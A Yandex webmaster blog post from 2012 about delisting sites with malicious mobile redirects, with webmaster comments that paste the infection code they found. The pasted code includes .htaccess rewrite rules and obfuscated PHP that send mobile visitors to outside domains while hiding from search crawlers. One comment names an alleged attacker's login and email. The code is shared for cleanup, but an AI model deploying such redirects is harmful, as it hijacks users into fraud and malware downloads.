Блог Яндекса для вебмастеров

Яндекс исключает сайты с вредоносными мобильными редиректами из результатов поиска

28 февраля 2012, 21:18

Мы уже писали об угрозе, которую представляют вредоносные мобильные редиректы для мобильных устройств. В декабре прошлого года мы разослали предупреждения о потенциальной опасности вебмастерам более 16000 сайтов. Многие вебмастера удалили вредоносный код. Тем не менее, заражённые сайты продолжают появляться. Сейчас Яндексу известно более тысячи ресурсов с вредоносными мобильными редиректами.

Сегодня мы начали исключать эти сайты из мобильных результатов поиска, так как при переходе на них пользователь не может получить ответ на свой вопрос. Кроме того, теперь Яндекс предупреждает пользователей о мобильных редиректах на сайте и в большом поиске — ведь если они есть на сайте, скорее всего, он взломан злоумышленниками и может нанести вред компьютеру или мобильному устройству. Мы также предупреждаем об опасных мобильных редиректах наших партнёров — через Safe Browsing API Яндекса.

 

 

При переходе на один из достаточно популярных сайтов срабатывает вредоносный мобильный редирект, и пользователь видит страницу:

 

Если нажать на «Обновить сейчас», а для просмотра используется, например, iPhone, страница делает вид, что устанавливает обновление браузера, — в соответствующем стиле:



В конце «установки» страница запрашивает номер мобильного – чтобы подписать пользователя на платные услуги. Часть денег от этой подписки будут получать злоумышленники, создавшие страницу.



Если на ту же страницу зайти с устройства, работающего под Android, страница предложит загрузить в формате .apk.



А если использовать обычный телефон, поддерживающий java, страница предложит загрузить подобную вредоносную программу в формате .jar.

 

Если на вашем сайте обнаружен вредоносный редирект, но вы не размещали его самостоятельно, то, скорее всего, сайт был взломан. В этом случае вам поможет эта статья.


Команда безопасного поиска Яндекса

 

43 комментария
Подписаться на комментарии к посту
Комментарий удалён

Реальное спасибо Яндексу.

Именно настойчивое предупреждение помогло найти джумла-модуль который перенаправлял на "ОБНОВЛЕНИЕ ФЛЭШ ПЛЭЙЕРА".

А я всё игнорировал. И при этом удивлялся и чего меня мой сайт перекидывает на обновление флэша. Ведь я в андроид установил к прошивке нормальный флэш...

 

А решил просто - C-Panel хостинга имеет антивирусный сканер. Вот он-то и показал, что загажено.

 Или пользуйтесь скриптом проверки

Болдырев Михаил
29 февраля 2012, 03:13
Не реально! Проблема на уровне взлома апач, пхп, многие хостеры сами не могут это себе залатать. Скрипт сидит в одном из файлов и переписывать по расписанию все хтаксес!
Если ТОП студия с 1000 проектов ломает голову как решить проблему кординально, чтоб для разных ситуаций всё было защищено - обычные сайтовладельцы нечего не сделают.

P.S. CMS значение не имеет, даже битрикс ложится. Если избавляться от апач, тоже смысла нет (обычные хостинги этого не дают сделать). Вариант только на уровне PHP
Болдырев Михаил
29 февраля 2012, 03:19
В общем предупреждение пишите, из индекса не удаляйте! Иначе множество сайтов падёт, по нашим сведениям 90% сайтов заражены (исследования не проводили, эмпирическим путём смотрим). И даже если удалять редиректы, они раз в неделю обычно переписываться.

Т.к. сайты с вредоносными мобильными редиректами не отвечают на вопросы мобильных пользователей, а отправляют их к злоумышленникам, то на мобильной выдаче они совершенно бесполезны, и их там не будет, сколько бы их ни было. Хотя по нашим данным сайтов с мобильными редиректами существенно меньше, чем 90%.

Со всем согласен в выдаче они не нужны, но:

— заражение может произойти в любой момент.

— чтобы устранить вирус требуется время.

Хорошо, что определить и удалить такой вирус можно за час. Но, я со стопроцентной уверенностью могу сказать, что после удаления вируса сайт в выдачу мгновенно не попадет, это потеря денег для владельцев сайтов.

Если есть возможность надо делать предупреждение об угрозе, удалять сайт из выдачи, и востанавливать сразу же как вирус будет удален, тогда будет айс. 

Сейчас так? Сомневаюсь.

В среднем, время перепроверки примерно 12 ч., а общее время пребывания сайта, который активно лечат, в заражённом состоянии - по нашим данным, около 90 ч. Так что дальнейшее сокращение времени перепроверки Яндексом даст не очень большой эффект, гораздо лучше с самого начала следовать простым правилам, например этим, чтобы не допустить распространения вредоносного кода через сайт.

После 3х подобных заражения я лично меняю хостера.. :(. Хороший был хостер, но...

Несколько раз для проектов на WP помогал плагин Verve Mobile , который сам заботился о мобильной версии..

Считаю, редирект нужно использовать по своему назначению. Перенаправлять старую ссылку на новую своего сайта. А когда в поисках информации тебя кидает с одного сайта на другой, да еще с попандерами, то раздражает.

А различные версии для мобильных пользователей и десктопных на одном адресе держать?

Есть ли у яндекса отдельный User-Agent, который можно перенаправлять на мобильную страницу и она будет появлятся в мобильном поиске.

 

уже давно юзаю сервис nazamok.com, который умеет всю эту заразу определять и предупреждает владельца.

Спасибо!

Согласен, но в выдачу сайта не допускать, а лучше пресикать, либо же

предупреждать заранее.

А Яндексу как-нибудь о таких сайтах можно сообщать?

Есть пара доменов, которые оооооооочень давно этим промышляют, но открываются они безо всяких предупреждений.

насайте был обнаружен типа такого скрипта и теперь сайт выводится в результате поиска с пометкой.Послал запрос на пересмотр сайта еще месяц назад и никаких ответов и ничего..

Может кому-то поможет!  Сайт попал в зараженные оказалось взломали файл .htaccess добавили редирект на http://pubmob.ru/:

RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://pubmob.ru/inc/?red   [L,R=302]

так и есть. в директории с изображениями был такой файл и перенаправлял с картинки хрен знает куда

Расскажу свою историю
Получил сообщение о заражение, проверил - вроде все чисто, пало подозрение на скрипт гугла-аналистика, обновил - был добавлен на сайт очень давно, сейчас у них другой код уже, убрали предупреждение, через неделю опять, убрал код гугла, перепроверка - все равно заражен, поддержка яндекса сообщила, что блок изза мобильного редиректа, подозрение пало на рекламу бегуна - при заходе с андроида вверху странички вылазит реклама, отключил это фишку в бегуне, наблюдаю...

Яндекс запарил - каждые два дня помечает мой сайт как угрожающий - тоже мобильный редирект - а на самом деле никакого редиректа нет - глючит у них система походу

ищите. эта зараза хитро прячется. мы три дня искали, кучу дорвеев у себя нашли в директориях, но это не помогло. Спасло восстановление файлов с бэкапа двухмесячного, база в порядке оказалась

а где нашли, если не секрет?
потому что я перезалил файлы CMS, а шаблон сравнивал с бэкапами и все равно ничего не нашел

У нас на одном Неткате три сайта работали и все делали мобильное перенаправление.

в папках с дизайном и картинками дизайна лежала куча чужого хтмл-а - дорвеи, и тамошние htaccess перенаправляли с картинок. Но удаление не помогло. Вручную не нашли, где-то испорчены библиотеки движка. Пару файлов нашли, но тоже не помогло. в итоге бэкапнули все файлы сайтов. Пока ОК. Ждем реакции яндекса.

У себя в фаилах нашел такой код:
if(@preg_match(strtr('/(mpdh|jame|jovo|mybp|mpnp|woh|simb|wpndyws.ce|h2yne|phod|drypd)/p', 'oyiph2a', 'aoyiph2'), $_SERVER['HTTP_USER_AGENT']) && @preg_match(strtr('/(gyygle|iondex|mopl|vkyntokte)/p', 'oyiph2a', 'aoyiph2'), $_SERVER['HTTP_REFERER']) && @$_COOKIE['statCounter'] !=1){echo(strtr('vor exhTpme = new Dote();exhTpme.setTpme(exhTpme.getTpme() + 86400000);dycument.cyykpe = "stotCyunter=1; exhpres=" + exhTpme.tyGMTStrpng();>', 'oyiph2a', 'aoyiph2'));}
может быть кому поможет.
Также нашел фаил "lndex.php", который довал возможност править все мои фаилы и запуcкать shell команды

в каких файла, не подскажете? Движка? 

А мой сайт заблокировали, как мне кажется вообще из-за того, что я установил Гугловские банеры с рекламой. Вот Яндекс и злится.

Вячеслав
2 марта 2013, 13:19

Спасибо Яндексу. Что предупредили о вредоносном коде на сайте. В большинстве случаев вебмастера сами виноваты что забывают о безопасности сайта. Вот и мой сайт стал жертвой этой заразы. Но это лечится.
Нашёл в файле .htaccess - главном

RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker| - и так далее.

Принцип заходишь с мобилы на сайт идёт переадрисация на другой сайт или на скачку заразы для андроид например.

Неприятно ДА!? Но лечиться.

В моём случае сайт на DLE.Лечим...
1. Сразу меняем все пароли FTP на хостинге, сервере, VPS что у вас.
2. Проверяем компьютер антивирусным продуктом со свежими базами.
3. Фсе файлы .php и  .js сайта проверяем на наличие вредоносного кода, "глазками" и удаляем "ручками".
3. Выставляем права записи на все файлы которые уязвимы 444.
4. Ставим на сайт скрипт который делает снимок файлов и мониторит их изменение, отсылает вам стату.

В моём случае прошло две недели пока всё нормально. Откуда взялась эта дрянь в корне сайта остаётся только гадать!? Со стороны хостера или с компа залетела через ftp например. Но очень неприятно! Это как пришли к вам в дом и порылись в ваших вещах.

А Яндексу в данном случае огромное СПАСИБО что предупредил первым меня через вебмастер что на сайте вредоносный код. Все антивирусы и фаерволы предательски молчали.

У меня то же на DLE влетело в немилость Яши три сайта.

один раз действительно была всякая хрень в .htaccess - тогда разобрался, хорошо, что были резервные копии.Это была старая DLE 8.5, сейчас с версии 9.3 при установке движка вылезает рекомендация устанавливать права на .htaccess 444. Жизнь стала спокойней...

Теперь в админке в разделе "Настройка поддержки и работы с смартфонами" вообще всё отключил, подожду проверки , может поможет..т.е. кто и будет заходить, то будет видеть тупо только тексты..или может вообще вырезать этот мобильный шаблон пусть лучше у мобильных пользователей вылезает что-то типа"невозможность просмотра мобильной версии сайта", потеряешь несколько человек, зато всё будет работать.. может я и не прав...Уже не знаешь как и бороться...А кто-то выше правильно сказал: сайты с неприличным содержимым на каждом шагу - с ними надо бороться, а у меня сайт по здоровью, без партнёрок, вообще без сторонней рекламы... перекрыли и всё... Столько потеряно посетителей.. Несправедливости нет конца..

Откажитиесь от антивирусного продукта компании Sophos (R)

Ещё одна новость...сравнив файл index.php с резервным, обнаружил такую лишнюю шнягу:

 

$arr1 = array('android','MIDP','WAP','Windows.CE','PPC','Series60','Opera.Mini','Mobile','Symbian','Android','acs','alav','alca','amoi','audi','aste','avan','benq','bird','blac','blaz','brew','cell','cldc','cmd-','dang','doco','eric','hipt','inno','ipaq','java','jigs','kddi','keji','leno','lg-c','lg-d','lg-g','lge-','maui','maxo','midp','mits','mmef','mobi','mot-','moto','mwbp','nec-','newt','noki','opwv','palm','pana','pant','pdxg','phil','play','pluc','port','prox','qtek','qwap','sage','sams','sany','sch-','sec-','send','seri','sgh-','shar','sie-','siem','smal','smar','sony','sph-','symb','t-mo','teli','tim-','tosh','tsm-','upg1','upsi','vk-v','voda','w3cs','wap-','wapa','wapi','wapp','wapr','webc','winw','winw','xda','xda-','up.browser','up.link','windows.ce','iemobile','mini','mmp','symbian','midp','wap','phone','pocket','mobile','pda','PPC','Series60','Opera.Mini');
$arr2 = array('windows.nt','bsd','x11','unix','macos','macintosh','playstation','google','yandex','bot','libwww','msn','america','avant','download','fdm','maui','webmoney','windows-media-player','wpc_nr');
$arr3 = array("/google.(.*)q=/","/yahoo.(.*)p=/","/bing.(.*)q=/","/aol.(.*)q=/","/ask.(.*)q=/","/altavista.(.*)q=/","/lycos.(.*)query=/","/alltheweb.(.*)q=/","/yandex.(.*)text=/","/rambler.(.*)query=/","/gogo.(.*)q=/","/mail.(.*)q=/","/nigma.(.*)s=/");
if(!$_COOKIE['opera'] && $_SERVER["HTTP_REFERER"]) {
    SetCookie("opera", "true");
    foreach($arr1 as $agent) {
        if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($agent)) !== false) {
            foreach($arr2 as $agent) {
                if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($agent)) !== false) $not=true;
            }
            if($not!==true) {
                foreach($arr3 as $pattern) {
                    if(preg_match($pattern, $_SERVER["HTTP_REFERER"])) {
                        ob_clean();
                        header('Location: http://getscontent.ru/id/6/url/');
                        ob_flush();
                        die();
                    }
                }
            }
        }
    }
}

 

Вот такие  дела... видимо это и есть причина... Срочно меняю пароли..

Тщательно проверьте все файлы на сайте и удалите все вредоносные редиктеры, потом установите ZEOS ANTIVIRUS ссылка на оф.сайт dle

http://dle-news.ru/modules/1058-zeos-antivirus.html#sel=1:1,1:2

И проверяйте файлы на изминение. Выставьте потом права 444 на эти файлы php которые наиболее уязвимы .htaccess,index.php,config.php и др. это не даст возможности редактирования файлов пока права 664 не выставишь.

 

После того как это случилось с моим сайтом я себя обезопасил таким образом.

 

Но потом спустя время я спецально выставил права на файл .htaccess в корне сайта 644 и стал мониторить ZEOS ANTIVIRUS каждые пять часов. И каковоже было моё удивление когда
ZEOS ANTIVIRUS через буквально три дня мне прислал стату на почту что на сайте изменён файл .htaccess. Я в шоке окуда лезит этот шел на сайт может через ftp с компа я поменял все пароли и антивирусник-файрвол у меня стоит не плохой с новыми базами.

 

После повторного удаления этой гадости я опять поставил права 444 и больше не эксперементировал. Сейчас полёт нормальный. Но вот вам инфо. для размышления почитайте полезно

http://dle-shop.ru/news-and-other/173-vzlom-dle-zagruzkoy-avatara-s-vredonosnym-kodom-i-kak-s-etim-borotsya.html

Спасибо! Отличная статья..!

http://dle-shop.ru/news-and-other/173-vzlom-dle-zagruzkoy-avatara-s-vredonosnym-kodom-i-kak-s-etim-borotsya.html

Кстати этого чувака, что описан в статье и заражает файлы нашёл и на своих сайтах.. Просто забанил и убрал возможность регистрации на сайте...Его логин "tehApocalypse" почта tehapocalypse@ya.ru

Вот бы найти его и ***** немного..

ОГРОМНОЕ СПАСИБО ЯНДЕКСУ! Спас мой блог от заразы, которая перенаправляла на гнилые сайты. Всё это случилось после установки плагина МОБИЛЬНАЯ ВЕРСИЯ САЙТА. Не устанавливайте этот плагин, иначе попадёте под вирус. Пришлось откатывать бэкап блога - спасибо хостингу.

Спасибо - у меня было заражено два моих сайта - все вовремя устранили!

Проверка на вирусы он-лайн сканерами дала отрицательный результат - сайт чист. А прочитав ваши комментарии, был найден вот такой код в главном файле htaccess:
RewriteCond    %{HTTP_USER_AGENT}  (android|htc_)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(yandex|google|bot)    [NC]
RewriteRule    (.*)    http://dledle.net/user/id?3    [L,R=302]

И кстати сортировка по дате изменения файла не помогла. Дата старая - а файл подменен... Вот так

Жду вердикта Яндекса. Спасибо всем, кто делился своим опытом!

После удаления этог злощастного кода - пометку с сайта удалили сразу же. Ура!

К сожалению моя эпопея на этом не закончена... Уже третий раз за неделю Яндекс помечает мой сакт, как опасный. То присылает письмо, что все ОК, то опять-вирус. Причем ни один файл за последние 2 дня не изменился... Все перепроверено... Все пароли сменены. Что это? Глюк? Где еще искать?????

взыскание долгов

А кто-нибудь может посоветовать по поводу мобильного редиректа. Недавно мой сайт понизили в выдаче. Техподдержка объяснила, что мой сайт перенапрвляет на сайты с платным контентом. У меня стоит редирект на мобильную версию сайта. На мобильной версии всё бесплатно. Попробовал зайти с одного смартфона на свой сайт - редиректа на платный контент нет. Захожу с другого смартфона под другим ip - редиректа опять нет. Проверил айболитом - всё чисто. Может кто-нибудь объяснить почему так? Может Яндекс определяет мой редирект на мобильную версию сайта как опасное перенапрвление на сайт с плаными подписками? Может это ложное срабатывание? Кто что скажет.

firstlena.pershina
11 ноября 2015, 20:29

А поддержку просили уточнить, на какой сайт редиректит с вашего? 

Ответ поддержки:

К сожалению, у нас нет возможности привести примеры страниц, а также конкретизировать причины, которые спровоцировали применение санкций к Вашему сайту. Это связано со спецификой работы наших алгоритмов.
Проверьте, пожалуйста, самостоятельно сайт на предмет использования на нем приемов, о которых написано здесь http://webmaster.ya.ru/replies.xml?item_no=20239 и устраните их.

firstlena.pershina
12 ноября 2015, 12:01

Можно номер вашего таска в поддержке? 

11061316150239433

firstlena.pershina
14 ноября 2015, 17:21

Добрый день! Проверила тикет. Поддержка в данном случае отработала корректно, действительно были зафиксированы описанные выше редиректы. Как я понимаю, сейчас они больше не повторяются, поэтому и последствия данного нарушения должны быть удалены в скором времени.  

Здравствуйте. Спасибо огромное за потраченное на меня время. В том, что поддержка отработала корректно в принципе я и не сомневался. Просто сам факт нарушеня так и остался для меня загадкой. Вроде нарушение было, но зафиксировать его я так и не смог. Ещё раз спасибо. 

firstlena.pershina
15 ноября 2015, 23:28

Такое иногда может быть из-за отображения зараженной рекламы из баннерокрутилок, которые не проверяют баннеры. Но я не могу точно сказать, ваш это случай или нет. Возможны и другие причины возникновения такого редиректа.